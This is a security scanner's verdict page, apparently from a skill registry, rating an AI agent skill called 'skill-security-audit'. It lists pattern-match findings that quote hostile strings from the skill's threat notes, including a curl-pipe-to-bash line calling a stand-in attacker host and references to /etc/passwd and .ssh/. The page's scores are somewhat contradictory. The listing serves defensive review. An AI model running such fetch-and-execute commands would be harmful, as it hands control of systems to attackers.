Caveat verdict

skill-security-audit

skill-security-check

88
🟢 Trusted
No high-risk patterns surfaced by the deep scan — automated capability review, not behavioral proof.

A comprehensive security audit workflow that runs a local Python scanner and optionally fetches skills from ClawHub for analysis; all operations are transparent and serve the stated security auditing purpose.

⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.

Automated static analysis — not a human review. Caveat flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.

0
security
90
transparency
70
maintenance

Findings (11)

Pattern match high

Pipe to bash — executes piped content as shell commands

references/threat_knowledge_base.md · prose · downgraded · | bash

Pattern match high

Pipe-to-shell pattern (curl | sh) — supply chain attack vector

references/threat_knowledge_base.md · prose · downgraded · curl -fsSL http://attacker-ip/script | bash

Pattern match high

Pipe-to-shell pattern (wget | sh)

references/threat_knowledge_base.md · prose · downgraded · wget | sh

Pattern match high

Pipe to sh — executes piped content as shell commands

references/threat_knowledge_base.md · prose · downgraded · | sh

Pattern match high

Accesses sensitive system files

references/threat_knowledge_base.md · prose · downgraded · /etc/passwd

Pattern match medium

Accesses system credential store

SKILL.md · prose · downgraded · Keychain

Pattern match medium

References sudo — requests elevated privileges

references/threat_knowledge_base.md · prose · downgraded · sudo

Pattern match medium

Accesses .ssh directory

references/threat_knowledge_base.md · prose · downgraded · .ssh/

Pattern match low

Base64 encoding/decoding

SKILL.md · prose · downgraded · Base64-encode

Pattern match low

Python urllib.request — network access

scripts/scan_skill.py · prose · downgraded · urllib.request

Pattern match low

Python shutil file operation — copies/moves/deletes files

scripts/scan_skill.py · prose · downgraded · shutil.rmtree(

Why the tier is capped

Execution sink present in raw bytes (Hard Floor: class A/F). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.

Permissions & capabilities

No declared permissions — minimal attack surface.

Is this flag fair?

Check another skill Browse the registry Auditing your own skills or configs? Use the API